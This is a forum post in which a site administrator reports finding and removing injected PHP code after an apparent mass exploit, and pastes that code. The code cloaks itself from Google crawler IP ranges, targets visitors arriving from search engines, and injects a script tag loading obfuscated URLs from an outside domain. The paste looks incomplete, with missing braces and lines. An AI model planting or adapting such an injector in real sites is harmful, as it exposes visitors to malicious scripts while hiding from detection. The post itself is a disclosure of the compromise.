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10 comments, last by Michael Tanczos 9 years, 4 months ago

Thanks for the additional information! :)

- Jason Astle-Adams


I disabled every ad network we use.. I'm looking for anything else unusual but I'm not seeing anything yet.

UPDATE: Found something.. might have been from a forum exploit. It's removed for now.

UPDATE2: Awesome.. looks like some type of mass exploit.. here was the code:


function kmhNNPH($p) {
$m = false;
$file_d = '/tmp/._tmpURtDPCgF';
$ip_l = (string)ip2long($p);
if(file_exists($file_d) and @is_writable($file_d) and (($size_f = @filesize($file_d)) > 0)) {
$data = file_get_contents($file_d);
$data .= "$ip_l,";
if(substr_count($data,"$ip_l,") <= 1) $m = true;
if($size_f > 1000000) $data = "$ip_l,";
return $m;
} else return true;
function VrUJjeJd($p) {
$sec = 'oTkdDkELRzXFvisX';
$key = substr(sha1($_SERVER['HTTP_USER_AGENT'].$p.$sec),0,mt_rand(15,39));
$key = explode("\n",chunk_split($key,(strlen($key)/mt_rand(2,8)),"\n"));
$b = implode('',array_merge(range('G','Z'),range('g','z'))).'___';
$g = array();
foreach($key as $str) {
if($str == '') continue;
$n = '';
for($i = 0;$i<=strlen($str)-1;$i++) {
$n.= ((mt_rand(1,2) == 1) ? $b[mt_rand(0,42)] : '').$str[$i].((mt_rand(1,2) == 1) ? $b[mt_rand(0,42)] : '');
$g[] = substr(str_shuffle(implode('',array_merge(range('A','Z'),range('a','z'),range('0','9'))).'____'),0,mt_rand(3,6)).'='.$n;
$url = '/?'.implode('&',$g);
return "\r\n<script type=\"text/javascript\" src=\"http://luissiania.com$url\"></script>";
function BFaYmrYG() {
$ip = '';
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$arr = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);
if(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/',$arr['0'])) {
$ip = $arr['0'];
return (!empty($ip)) ? $ip : @getenv('REMOTE_ADDR');
function GLadUzoz() {
if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|excite|lycos|myspace|alexa|doubleclick#i',$_SERVER['HTTP_REFERER'])) {
if(preg_match('#msie|firefox|opera|chrome|Trident#i',$_SERVER['HTTP_USER_AGENT'])) return true;
function PSGAeiAkX($p) {
$a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.','72.14.','66.249.','66.102.','64.233.');
foreach($a as $b) {
if(preg_match("/^$b/i",$p)) return true;
function xbNcmYEJ() {
if(!empty($_SERVER['HTTP_REFERER']) and !empty($_SERVER['HTTP_ACCEPT']) and !empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
if(GLadUzoz() and ($p = BFaYmrYG()) and !PSGAeiAkX($p) and kmhNNPH($p)) return VrUJjeJd($p);
return '';
return @xbNcmYEJ();

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